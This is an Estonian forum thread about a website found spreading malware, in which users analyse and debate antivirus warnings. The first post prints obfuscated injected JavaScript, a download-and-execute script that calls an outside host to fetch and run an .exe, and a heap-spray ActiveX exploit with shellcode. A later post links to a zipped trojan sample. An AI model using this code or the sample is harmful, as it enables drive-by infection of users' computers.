Avaleht
uus teema   vasta Tarkvara »  Turvalisus »  trenn.ee levitab viirusi ? märgi kõik teemad loetuks
märgi mitteloetuks
vaata eelmist teemat :: vaata järgmist teemat
mine lehele 1, 2  järgmine
Hinnavaatlus :: Foorum :: Uudised :: Ärifoorumid :: HV F1 ennustusvõistlus :: Pangalink :: Telekavad :: HV toote otsing
autor
sõnum Saada viide sõbrale.  :: Teata moderaatorile teata moderaatorile
otsing:  
kose2ik
HV kasutaja
kose2ik

liitunud: 02.05.2002



Autoriseeritud ID-kaardiga

sõnum 22.12.2006 02:14:23 trenn.ee levitab viirusi ? vasta tsitaadiga

Sattusin kogemata lehele www.trenn.ee ja AVG-Antivirus pistus kisendama...
lähemalt uurides avastasin source viimaselt realt põhjustaja

<script language="JavaScript">

e = '0x00' + '46';
str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE%A7%AE%AD%AE%B5%BE%
FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE%A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%
B5%A9%FF%E8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8%E7%D9%B0%AE%
A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA%F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%
FD%E8%A5%AE%B3%FB";
str=tmp='';
for(i=0;i<str1.length;i+=3){
tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}
document.write(str);

</script>


ka netis on sellest juttu

ülal olev asi teeb järgneva html rea
<div style="visibility:hidden"><iframe src="http://hhhg1.com/ment/" width=1 height=1></iframe></div>


see hhhg1.com on vist mingu Russ'ide server

seal lingil on selline source
<script src="http://trfcnt.com/wa/ment/softngine.js"></script>
<script src="http://trfcnt.com/wa/trfall/softngine.js"></script>
<iframe src="tmp.php" width=1 height=1></iframe><!--<script>
setTimeout('Onload()', 50000);
function Onload(){
self.focus();
document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src="kf.html"></iframe>');
}
</script>-->


põhiasi siis ongi aadressil hhhg1.com/ment/tmp.php :
<script language="javascript">

var objtagobj = document.createElement("object");
objtagobj.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var obj_msxml2 = objtagobj.CreateObject("msxml2.XMLHTTP", "");
obj_msxml2.open("GET", "http://hhhg1.com/ment/ld_ment.exe", false);
obj_msxml2.send();

var obj_adodb = objtagobj.CreateObject("ad" + "odb.stream", "");
obj_adodb.type = 1;
obj_adodb.open();
eval("obj_adodb.Wr" + "ite(obj_msxml2.responseBody)");
var fn = "C:\\system.exe";
eval("obj_ad" + "odb.Sa" + "veToFile(fn, 2)");

var s = objtagobj.CreateObject("Shell.Application", "");
s.ShellExecute(fn);

</script>


see hhhg1.com/ment/kf.htmlpaistis ka huvitav asi olema ( peab linuxi kaudu uurima )

<html>
<head>
</head>
<body>
<script>

function retyttyuty(erwfrhhrhfg, erwfrhhrhfgSize)
   {
      while (erwfrhhrhfg.length*2<erwfrhhrhfgSize)
      {
         erwfrhhrhfg += erwfrhhrhfg;
      }
      erwfrhhrhfg = erwfrhhrhfg.substring(0,erwfrhhrhfgSize/2);
      return erwfrhhrhfg;
   }

var yuwergufiudf = 0x0F0F0F0F;
var vhusdifsdifdbwfbsdf = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%
u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%
uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%
u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%
u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%
u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%
uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%
uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%
u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%
u7074%u2F3A%u682F%u6868%u3167%u632E%u6D6F%u6D2F%u6E65%u2F74%u646C%u6D5F%u6E65%
u2E74%u7865%u0065");

      var uyywifssdfdsf = 0x400000;
   var afddssddsfsdfxc = vhusdifsdifdbwfbsdf.length * 2;
   var erwfrhhrhfgSize = uyywifssdfdsf - (afddssddsfsdfxc+0x38);
   var erwfrhhrhfg = unescape("%u0D0D%u0D0D");
   erwfrhhrhfg = retyttyuty(erwfrhhrhfg,erwfrhhrhfgSize);
   iusdiuiudfsd = (yuwergufiudf - 0x400000)/uyywifssdfdsf;

   memory = new Array();
   for (i=0;i<iusdiuiudfsd;i++)
   {
      memory[i] = erwfrhhrhfg + vhusdifsdifdbwfbsdf;
   }





var target = new ActiveXObject("DirectAnimation.PathControl");
target.KeyFrame(0x40000E0A, new Array(1), new Array(1));
</script>
</body>
</html>


seda hhhg1.com/ment/ld_ment.exe faili sisu uurides leidsin veel ühe lingi hhhg1.com/ment/vw.dat

_________________


viimati muutis kose2ik 24.12.2006 18:42:46, muudetud 2 korda
Kommentaarid: 47 loe/lisa Kasutajad arvavad:  :: 1 :: 0 :: 40
tagasi üles
vaata kasutaja infot saada privaatsõnum
purexpure
HV veteran

liitunud: 05.01.2006




sõnum 22.12.2006 02:29:26 vasta tsitaadiga

WTF...Sa töötad mingi mega widescreeni peal?
Kommentaarid: 58 loe/lisa Kasutajad arvavad:  :: 4 :: 1 :: 47
tagasi üles
vaata kasutaja infot saada privaatsõnum
pppd
Kreisi kasutaja

liitunud: 21.06.2004




sõnum 24.12.2006 14:25:42 vasta tsitaadiga

kas sa trenn.ee haldajale teatasid? See suht levinud viis igasuguste jälkuste levitamiseks ning tavaliselt lehekülje omanik ei teagi, et nende leht sitta keerab.

.. ja mõned reavahetused võiks sellesse koodi küll sisse orgunnida
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum
kose2ik
HV kasutaja
kose2ik

liitunud: 02.05.2002



Autoriseeritud ID-kaardiga

sõnum 20.02.2007 14:59:09 vasta tsitaadiga

pppd kirjutas:
kas sa trenn.ee haldajale teatasid? See suht levinud viis igasuguste jälkuste levitamiseks ning tavaliselt lehekülje omanik ei teagi, et nende leht sitta keerab.

.. ja mõned reavahetused võiks sellesse koodi küll sisse orgunnida

teavitasin omanikku ... arvan et nende sisuhalduse mootoris mingis kohas nn. viga sees ja selle leidnud "kräkker" pole tahtnud kogu lehte ära solkida vaid lõikas sellest "turvaaugust" oma kasu ... siiani pole veel pihta saanud mida see viirus teeb ... aga tahaks teada ikka


edit 2007.veb.20:
Teavitasin täna jälle neid omanikke
... jube pikka aega polereageeritud miskipärast
e. siiani see jama seal :S

_________________
Kommentaarid: 47 loe/lisa Kasutajad arvavad:  :: 1 :: 0 :: 40
tagasi üles
vaata kasutaja infot saada privaatsõnum
AJ
HV Guru
AJ

liitunud: 03.02.2005




sõnum 20.02.2007 15:22:54 vasta tsitaadiga

Nad kas ei oska sellega midagi arukat teha või on neil litsalt savi.
_________________
Küsige mida tahate, me vastame mida tahame.
Kommentaarid: 37 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 36
tagasi üles
vaata kasutaja infot saada privaatsõnum
pppd
Kreisi kasutaja

liitunud: 21.06.2004




sõnum 20.02.2007 21:12:29 vasta tsitaadiga

Teata nende hostingupakkujale (zone.ee-le). Kui leht kinni keeratakse, ehk siis tekib huvi.

Veel üks võimalus oleks CERT-EE'le teatada, las nemad peksavad siis ise nii teenusepakkujat kui lehe omanikku.
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 20.02.2007 23:17:01 vasta tsitaadiga

Sa pole siiamaani teatanud, mis viiruse AVG antiviirus arvas olevat.

Avasin www.trenn.ee IE7-ga. Nod32 ei arva midagi kahtlast olevat. IE7 kollane information bar teatab " This website wants to run the following add-on: "Microsoft Data Access -Remote Data Services Dat" - from `Microsoft Corparation`

Ka selle ActiveX komponendi lubamisel ei arvanud Nod32 midagi kahtlast.

Midagi halba ei leidnud Nod32 ilmselt seetöttu, et praeguseks pole http://hhhg1.com/ leht enam toimiv.

Kui sa leiaks arvutist ld_ment.exe ja/või C:\\system.exe , siis saaks analüüsida mida need teevad. Ilmselt mingi trooja.
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
loser
HV kasutaja

liitunud: 13.08.2006




sõnum 20.02.2007 23:40:44 vasta tsitaadiga

Hm,Kaspersky AV hakkas seal lehel karjuma nagu siga aia vahel ja lõi hulga aknaid lahti hoiatustega.IE7 ja arvuti olid suhteliselt koomas nii kaua kui sellelt lehelt minema ei saanud.Trojan downloader JS agent.CB ja mida veel.AV reageeris just sell hetkel kui information bar ülesse ilmus.
Kommentaarid: 17 loe/lisa Kasutajad arvavad:  :: 1 :: 0 :: 16
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 21.02.2007 02:32:52 vasta tsitaadiga

Kaspersky eksib seekord.

Nagu enne mainisin, avasin trenn.ee lehe ja lubasin activex componendil käivituda.

Seejärel skännisin Kaspersky online viirusetõrjega http://www.kaspersky.com/virusscanner
kogu kõvaketta läbi, ning ei leitud mingit viirust.

Ilmselt Kaspersky leiab tuntud activeX elemendiga allatirimise meetodi, mille korral on/oli võimalik pahalast laadida ja annab selle peale hoiatuse. Tegelikult aga midagi alla ei laeta, kuna http://hhhg1.com/ ei ole enam aktiivne ja sealt ei saa enam midagi alla tirida. Sama allatirimise meetod võib ka õige/seadusliku infi tarvis olla.

Kui kellelgi õnnestub mingi trooja või viirus alla tirida trenn.ee kaudu andke teada konkreetne fail, mis on nakatunud.

Sellega ei taha ma öelda, et trenn. ee lehega kõik korras on. Lihtsalt mul ei õnnestunud selle lehe kaudu nakatuda. Arvan, et Kaspersky hoiatus on ennatlik, tegelikult isegi kui eirate seda, siis tõenäoliselt te ei saa mingit nakkust, kuna sait kust pahalast tirida proovitakse - http://hhhg1.com/ ei ole enam aktiivne.

Korrektne on teavitada kasutajat alles siis , kui tõepoolest troojat viirust on allatiritud ja proovitakse kävitada.

Loomulikult on mul kõigi uuendustega winxp pro sp2, IE7, võibolla see mängib ka rolli.


viimati muutis jossi 1 21.02.2007 02:36:03, muudetud 1 kord
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
Elof
HV Guru
Elof

liitunud: 07.05.2003




sõnum 21.02.2007 02:35:53 vasta tsitaadiga

Kaspersky viitab muuseas täpsemalt sellistele objektidele:
http://www.viruslist.com/en/search?VN=Exploit.JS.ADODB.Stream.ac&referer=kis
http://www.viruslist.com/en/search?VN=Trojan-Downloader.JS.Agent.cb&referer=kis
Need ei ole jah otseselt pahalased ise, ent Kaspersky hoiatab ka selliste exploitide eest. Loomulikult võimalik lubada asjal vabalt tegutseda.
Igal juhul eksida pole siin midagi, lehel on exploit'id.
Kommentaarid: 212 loe/lisa Kasutajad arvavad:  :: 2 :: 0 :: 175
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 21.02.2007 02:39:32 vasta tsitaadiga

Jah, aga kas neid exploite ka tegelikutl saab allatirida?

Pealegi sinu linkidel on Kaspersky napisõnaline ja teatab, et mingit infi ta sulle ei paljasta. Jätab enda teada, vist firmasaladus icon_smile.gif
Currently there is no description available for this program.
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
Elof
HV Guru
Elof

liitunud: 07.05.2003




sõnum 21.02.2007 02:44:25 vasta tsitaadiga

jossi 1 kirjutas:
Jah, aga kas neid exploit ka tegelikutl saab allatirida?

Pealegi sinu linkidel on Kaspersky napisõnaline ja teatab, et mingit infi ta sulle ei paljasta.
Currently there is no description available for this program.

Kas neid on tarvis alla tirida?
Mind kui tavakasutajat ausaltöeldes eriti ei huvita igasuguse pahna masinasse lubamise võimalikkus.
Lihtne hoiatus:
Antud lehe puhul tõesti "kahjuks" ei saa mingit solki endale arvutisse, ent exploit on siiski see, mille eest hoiatatakse.
Kommentaarid: 212 loe/lisa Kasutajad arvavad:  :: 2 :: 0 :: 175
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 21.02.2007 02:47:54 vasta tsitaadiga

Hoiatatakse olematu exploidi eest????
Pane allow ja proovi see tripper alla laadida.
Teata, mida alla laadisid.

Kui mingit tripperit alla ei laeta pole põhjust Kasperskyl ka hoiatada.


viimati muutis jossi 1 21.02.2007 02:49:51, muudetud 1 kord
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
Elof
HV Guru
Elof

liitunud: 07.05.2003




sõnum 21.02.2007 02:51:36 vasta tsitaadiga

Saad sellest aru, et ühel lehel on kood, mis viitab teise veebi?
Olgu seal teises servus solk või hunnik viinamarju, vahet ei ole. Antud puhul siis too teine paik kus tõeline solk asub, jõutud juba kummuli lükata.
See ei muuda aga fakti, et esimesel lehel on siiski exploit olemas icon_rolleyes.gif

Kui uurida seda koodi, mis esimese postis kirjas siis siililegi selge, et:
obj_msxml2.open("GET", "http://hhhg1.com/ment/ld_ment.exe", false);

Mingit vajalikku kraami ei tähenda.

jossi 1 kirjutas:
Põhiline millele surun - Kaspersky hoiatab ennatlikult, ei saa mingit nakkust endale sealt.

Selline hoiatus võib teatud olekus kasulik olla , samas ei ole see päris õige.

Riputasin pildi üles, mis valeinformatsiooni/hoiatust seal leiad?
Normaalsete lehtede puhul sellist hoiatust ei ole.


viimati muutis Elof 21.02.2007 02:53:53, muudetud 1 kord
Kommentaarid: 212 loe/lisa Kasutajad arvavad:  :: 2 :: 0 :: 175
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 21.02.2007 03:02:08 vasta tsitaadiga

Tiri see tripper alla.

Kui sa mingit troojat ei suuda alla tirida, siis pole mõtet edasi rääkida.




Põhiline millele surun - Kaspersky hoiatab ennatlikult, ei saa mingit nakkust endale sealt.

Selline hoiatus võib teatud olekus kasulik olla , samas ei ole see päris õige.

Teavitada võiks siis kui ka tegelikult on pahalane alla tiritud, ning seejärel antakse kasutajale võimalus see kustutada.

Aga mis siis kui seal on tõepoolest õige inf ehk viinamarjad ja ma usun Kasperskyt ning ei luba edasi tegutseda? Jään marjadest ilma?
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
Elof
HV Guru
Elof

liitunud: 07.05.2003




sõnum 21.02.2007 03:31:59 vasta tsitaadiga

jossi 1 kirjutas:

Aga mis siis kui seal on tõepoolest õige inf ehk viinamarjad ja ma usun Kasperskyt ning ei luba edasi tegutseda? Jään marjadest ilma?

Siis lubad faili laadida. Kaspersky lubab ju valida. Ning siis kui saast jõuab arvutisse siis teatab Kaspersky eraldi, et solk on kenasti kohale jõudnud ning lubab siis uuesti valida kustutamise, parandamise, karantiini ning rahulejätmise vahel.

Sellist meetodit, nagu antud lehel, ei kasuta lihtsalt ükski peaga mõtlev veebitreial kunagi mingi vajaliku kraami suunas viitamiseks. Sellepärast ka hoiatus.
Aga what the fuck do I know about veebiehitamine icon_razz.gif

Ses mõttes viiruste ja iseleviva reklaam-saasta juures siis ka kahtlev seisukoht, et "ehk jääb midagi head saamata" kui saast kustutada arvutist?
Kommentaarid: 212 loe/lisa Kasutajad arvavad:  :: 2 :: 0 :: 175
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 21.02.2007 20:07:25 vasta tsitaadiga

Minu point - soovin teadet alles siis, kui tegelikult ka pahalane on allalaetud.

Antud näite korral Kaspersky kisab liiga vara.

Sama hästi võiks antivirus kisama hakata internet exploreri käivitamisel - "kasuta mõnda teist brauserit kuna IE on ebaturvaline"
või käivitades windowsi Kaspersky teatab "windows on ebaturvaline, Kas lubad windowsil edasi tegitseda? Vaikimisi valitud - ei luba" icon_smile.gif
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
pppd
Kreisi kasutaja

liitunud: 21.06.2004




sõnum 21.02.2007 21:33:29 vasta tsitaadiga

Sellest võib siis aru saada et Sa ei soovi hoiatust selle kohta et Su brauser oli kätte saanud koodijupi mis viirusetõrje hinnangul on võimeline ära kasutama mingit brauseri auku ja võib selle kaudu mingit järgmist sodi sinu masinas käivitada? Oled Sa nii kindel et Su brauseri augud on kõik kinni topitud? Teist hoiatust ehk enam ei tulegi, osad sellised dropperid ei vaevu oma kandamit kettale kirjutamagi ja viirusetõrje tapetakse-neutraliseeritakse otse lennult, seejärel aga tuuakse juba pool või rohkemgi Internetist leiduvast läbust Sulle arvutisse.

Ei ole mõtet oma vaenlast alahinnata, veel vähem pakutud abivahendeid ignoreerida. Selle taseme hoiatus ei saa kuidagi olla üleliigne, see teavitab et Sa oled jõudnud potentsiaalselt ohtlikule lehele, mis aktiivselt üritab Su masinat maha murda.
Kommentaarid: 3 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 3
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 21.02.2007 23:05:22 vasta tsitaadiga

pppd kirjutas:
mis viirusetõrje hinnangul on võimeline ära kasutama mingit brauseri auku ja võib selle kaudu mingit järgmist sodi sinu masinas käivitada?


Ei soovi jah sellist puudulikku hinnangut. Antud juhul ei saa ma troojat alla tirida kuna allikas maas. Alles pahalase allalaadimisel soovin teadet. Käivitada viirusetõrje enam ei luba!

Kaspersky tegi oma hinnagu ainult html sisu põhjal. Oletame, et failid mida proovitakse tirida on õiged kasulikud failid. Näiteks teen ise sama koodiga lehe ja jagan täiesti viirusevabasid faile (näiteks nimetan mingi õige faili ümber ld_ment.exe ja system.exe nimelisteks) . Kaspersky hakkab kisama selle peale ja ma ei saagi kasulikke faile kätte.
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
Elof
HV Guru
Elof

liitunud: 07.05.2003




sõnum 21.02.2007 23:25:18 vasta tsitaadiga

jossi 1 kirjutas:

Oletame, et failid mida proovitakse tirida on õiged kasulikud failid.

Oletame, et kanad munevad kuldmune icon_rolleyes.gif
Kommentaarid: 212 loe/lisa Kasutajad arvavad:  :: 2 :: 0 :: 175
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 21.02.2007 23:26:58 vasta tsitaadiga

Kui ma olen need ise sinna pannud, siis ma ei oleta, vaid tean täpselt, et on viirusevabad.

Hoopis Kaspersky oletab ilma faile otseselt kontrollimata.


viimati muutis jossi 1 21.02.2007 23:33:34, muudetud 1 kord
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
kose2ik
HV kasutaja
kose2ik

liitunud: 02.05.2002



Autoriseeritud ID-kaardiga

sõnum 21.02.2007 23:28:14 vasta tsitaadiga

olin esimese postituse ajal tõmmanud linuxiga selle exe faili alla jne
ja pakkisin kokku nüüd
ja viskasin sinna http://www.zone.ee/dbase005/hv/

_________________
Kommentaarid: 47 loe/lisa Kasutajad arvavad:  :: 1 :: 0 :: 40
tagasi üles
vaata kasutaja infot saada privaatsõnum
jossi 1
Kreisi kasutaja

liitunud: 19.08.2004




sõnum 21.02.2007 23:35:49 vasta tsitaadiga

Nod32 käitub korrektselt, teavitab mind allatirimisel
21.02.2007 22:34:34 IMON archive http://www.zone.ee/dbase005/hv/g.zip Win32/TrojanDownloader.Small.NRA trojan quarantined - Connection terminated

trenn.ee lehel Nod32 ei kisa, kuna sealt midagi momendil ei saanud.
Kommentaarid: 15 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 15
tagasi üles
vaata kasutaja infot saada privaatsõnum
O
Kreisi kasutaja
O

liitunud: 22.09.2005




sõnum 22.02.2007 00:29:30 vasta tsitaadiga

AVG ei leidnud mitte kui midagi icon_eek.gif

mina enam ilma id-kaardita panka siseneda ei julge

_________________
PS, kui teemades ei vasta
Kommentaarid: 76 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 69
tagasi üles
vaata kasutaja infot saada privaatsõnum
olc
HV Guru
olc

liitunud: 28.11.2001



Autoriseeritud ID-kaardiga

sõnum 22.02.2007 00:35:21 vasta tsitaadiga

kose2ik kirjutas:
olin esimese postituse ajal tõmmanud linuxiga selle exe faili alla jne
ja pakkisin kokku nüüd
ja viskasin sinna http://www.zone.ee/dbase005/hv/

NAV 2005 pani kohe pröökama kui lahti üritasin pakkida
Kommentaarid: 137 loe/lisa Kasutajad arvavad:  :: 0 :: 0 :: 125
tagasi üles
vaata kasutaja infot saada privaatsõnum
näita postitusi alates eelmisest:   
uus teema   vasta Tarkvara »  Turvalisus »  trenn.ee levitab viirusi ? mine lehele 1, 2  järgmine
[vaata eelmist teemat] [vaata järgmist teemat]
 lisa lemmikuks
näita foorumit:  
 ignoreeri teemat 
sa ei või postitada uusi teemasid siia foorumisse
sa ei või vastata selle foorumi teemadele
sa ei või muuta oma postitusi selles foorumis
sa ei või kustutada oma postitusi selles foorumis
sa ei või vastata küsitlustele selles foorumis
sa ei saa lisada manuseid selles foorumis
sa võid manuseid alla laadida selles foorumis



Hinnavaatlus ei vastuta foorumis tehtud postituste eest.